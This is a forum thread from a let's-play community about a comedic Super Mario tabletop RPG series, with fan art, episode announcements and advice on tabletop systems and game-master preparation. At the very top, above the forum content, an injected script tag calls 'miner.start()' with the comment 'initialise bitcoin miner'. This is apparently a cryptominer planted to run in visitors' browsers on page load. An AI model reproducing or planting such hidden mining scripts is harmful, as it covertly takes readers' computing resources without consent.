<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralsmbx communitypge project

A Super Mario Tabletop Thing - Now with Easy Watch Order

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
cats-on-ice
Back from the grave

Re: A Super Mario Tabletop Thing

Postby cats-on-ice » 5 years ago

kirbyman198 wrote:

Cats-on-ice should have really spent those plot points to spawn a child imo.

This series is really wacky and really fun to listen to! Great to stick in the background and work to.

this is the cutest thing and I'm making it my profile picture
Image<--- I h8 u horikawa

The Destroyer of Worlds
I am become death

Postby The Destroyer of Worlds » 5 years ago

okay no spoilers but the last session

involved a ukulele

. Also DRAMA.

(btw recording problems are fixed as promised)

also:

raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

Ditocoaf
Haustone Tournament Finalist
Pronouns: he/him/his

Postby Ditocoaf » 5 years ago

Yeah if people are actually enjoying listening the first few episodes that went up, it's only going to get better. This was a really fun session tonight.

Now that this isn't a secret project, we can drop torturously vague hype on you guys.

kirbyman198
Pass the chugurt
First name: Kirby
Pronouns: he/him she/her

Postby kirbyman198 » 5 years ago

cats-on-ice wrote:this is the cutest thing and I'm making it my profile picture
:0!! I feel so honored!! tyty

This series is really cool because it allows of fans to draw a bunch of fanart of the crazy shenanigans. Which I will do more of heheheh... And all of these vague hints are very exciting; I'll eagerly wait for next episodes!
Don't mind me, just passing through.

cats-on-ice
Back from the grave

Postby cats-on-ice » 5 years ago

AHHHHHHHHHHHH I'm loving the fan art. It makes me feel all fluffy ; u ;
Image<--- I h8 u horikawa

Sorel
In the shadows
First name: Alexander

Postby Sorel » 5 years ago

cats-on-ice wrote:fluffy
DID SOMEONE *voice cracks* wait I already did that a million times. Not fun anymore.

Sheesh I really need to catch up with this. The first few minutes of the first video were pretty entertaining, but eh... MAGL X 2 can't wait any longer.

Ditocoaf

Episode 4 is up!

We continue being a very competent, trustworthy, and cooperative police unit.

Shinoda

Postby Shinoda » 5 years ago

Can I make Boolina my waifu? She's sooo cute!
Horikawa Otane wrote:Butt-lamps are -30 points, so =p
ImageImageImage

Dizzybelle
Barrel!
First name: (◕ v ◕✿)
Pronouns: she/her

Postby Dizzybelle » 5 years ago

this is still the greatest thing
youre all so adorable
ImageImageImage

kirbyman198
Pass the chugurt
First name: Kirby
Pronouns: he/him she/her

Postby kirbyman198 » 5 years ago

Kinda bad because I rushed drawing this and also I was in MSpaint.
What was up with the random songs that played in the background? That was totally weird. Weird enough for me to draw this hehehe.
Don't mind me, just passing through.

Ditocoaf

kirbyman198 wrote:
Kinda bad because I rushed drawing this and also I was in MSpaint.
What was up with the random songs that played in the background? That was totally weird. Weird enough for me to draw this hehehe.
Yeah, that was a recording mixup, part of the roughness of that first session. I meant to ask raocow to put a warning in the video description but I forgot.

Octagon
zentraidon
Pronouns: she

Postby Octagon » 5 years ago

wait, birdos are a species?
Image WHAT DOES THE P STAND FOR

Dizzybelle
Barrel!
First name: (◕ v ◕✿)
Pronouns: she/her

Postby Dizzybelle » 5 years ago

Octagon wrote:wait, birdos are a species?

http://www.mariowiki.com/Birdo_%28species%29

e: link fixed
Last edited by Dizzybelle on 07 Mar 2015, 11:44, edited 1 time in total.
ImageImageImage

Xalnop
15 Peices

Postby Xalnop » 5 years ago

That link is slightly busted bkamakaze

Thanks!

kitikami

Postby kitikami » 5 years ago

Boolina saying "Rezcow is just so sketchy" is about the last thing I would have expected to hear a couple episodes ago.

Ditocoaf

I am hereby formally requesting some fanart of a group shot of the four (or five) of us. I might possibly use it for every video from here on out! Plus I'd just be incredibly grateful in general, y'know? :)

Ditocoaf

#6 is out (as of a several hours ago)!

https://www.youtube.com/watch?v=-Ijg5xkwglU

This is the episode where a friend is made, where Shit Goes Down regarding secrets, and where some other unfortunate event(s) happen.

We're unfortunately a little short on Jakey Boy in the second half of this episode (everyone kinda talks over him), but his time is coming, believe you me. His time is coming...

Rednaxela
Maker of Shenanigans

Postby Rednaxela » 5 years ago

As someone currently listening to #6... I'd just like to say, man... things just keep getting better. I get the impression of everyone seeming to have a better grasp of playing their characters as things go on. Also this plot... really curious to see where things go from here...

The Destroyer of Worlds
I am become death

ditocoaf wrote: make a post in the thread saying that podcast 6 is up
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

kitikami

Postby kitikami » 5 years ago

It's good to hear that Jakey Boy is finally getting to drive a go kart.

Compushwa
waow
First name: shwa

Postby Compushwa » 5 years ago

wasn't really in to this when it first came out so didn't watch it at first. decided to watch the latest one and it was the hardest i've laughed in a while, and now i'm catching up on watching the series.

makes me wish i had a friend who knew how to dungeon master (is that still the word considering this is using the cortex system and not d&d) so i could try out some silly fun times like this. my friend and i have always wanted to try out something like this but no one knows the rules and stuff like table top rpgs always seem daunting to learn.

The Destroyer of Worlds
I am become death

Compushwa wrote:wasn't really in to this when it first came out so didn't watch it at first. decided to watch the latest one and it was the hardest i've laughed in a while, and now i'm catching up on watching the series.

makes me wish i had a friend who knew how to dungeon master (is that still the word considering this is using the cortex system and not d&d) so i could try out some silly fun times like this. my friend and i have always wanted to try out something like this but no one knows the rules and stuff like table top rpgs always seem daunting to learn.
Well there are some systems that are more friendly than others. One reason DnD is so popular is that the rules are quite simple and easy to learn. Just avoid Shadowrun (which actually has dice rolls that involve square roots. Not even kidding), Eclipse Phase, etc. until you're more experienced with tabletop gaming.

For beginners I'd recommend Cortex (NOT Cortex Plus, it's kinda a mess), DnD 3.5, World of Darkness, and Warhammer Fantasy. The rules for those could easily be learned in a day or so. They're pretty easy! Cortex is my favourite, so I'm a bit biased, but the others are a lot of fun and super easy too!

Also it kinda depends on the DM style. I'm not the sort of DM who uses a lot of the internal mechanics, preferring organic storytelling flavoured with checks. But lots of DMs like to have a much more mechanical campaign. Rules are much more important there. Some aren't as big on organic storytelling and prefer to use modules with some degree of railroading (this seems to be the latest 'big thing'). Rules are absolutely vital in this style. It's all in what style you enjoy most, really. I know at least a couple people who *hate* being in my campaigns because they never know what to do. I know others who love it. So find a style that works for you and your friends and a system that's appropriate and go for it!

Compushwa
waow
First name: shwa

Postby Compushwa » 5 years ago

thanks for the advice. i'll probably check out cortex like you suggested when i get the money to buy the pdf rulebook thingamajig. i'd prefer to be a player rather than the DM, because frankly, i'm not really all that great at setting up a story and stuff like that. hope i can convince one o' my friends to DM instead.

The Destroyer of Worlds
I am become death

Compushwa wrote:thanks for the advice. i'll probably check out cortex like you suggested when i get the money to buy the pdf rulebook thingamajig. i'd prefer to be a player rather than the DM, because frankly, i'm not really all that great at setting up a story and stuff like that. hope i can convince one o' my friends to DM instead.
Well if they can't or won't DM and you think you'd have difficulty doing it, you could try a prefab scenario. There's lots of good, free ones out there. Use them as sort of a crutch until you get the 'feel' enough to write your own!

The Destroyer of Worlds
I am become death

Replying here because other people may be interested!
Compushwa wrote:heyo, just messaging ya so we don't clutter up the thread with me asking a bunch o' stuff. what do you mean by using modules and railroading?

also another question was how far in advance do you plan the game y'all got going on now? was talking to my friend about how difficult it might be to be a DM, and he said he thought you can make it as easy or hard on yourself as you want. like planning out a shit ton of scenarios or just bsing through it and everyone rolling with it.
A module is like a mini plot. It's generally good for 1-5 sessions depending on players, session length, etc. Lots of people make them and then put them online! It'll have characters, a plot, maps, stats, etc. I've never used a module, but I've been a player in several fun ones!

Railroading is leading the players to your destination or helping them not go outside of your box. Some people really like this, but my DM'ing style is the anti-railroader.

In terms of prep... It depends on the campaign style and how good you are at Improvisation. If you're bad at improv, you gotta plan more. If you are good at rolling with the punches (one of my few DM'ing talents), you can do less. My prep generally consists of writing out a basic "plot framework" that's a half page or so long that describes in general what the players have to do. "The players will find their way into the building and meet with the League of Janitors. There will be a single guard on the outside." That sort of thing. Then I have characters written down with stats, personality traits, and their action (grand motive), tactics (how they obtain that motive), and activities (what they do in their environment to showcase their personality). Those three things are a theatre directing trick and I employ it extensively to make fun and enjoyable characters that aren't all basically the same.

In terms of how far in advance... Generally each session has some planning involved, but you build off of previous planning. The first session is the hardest to plan for. After that it's just modifying stuff to react to the players while adding new stuff to ensure future stuff.

Return to “let's play”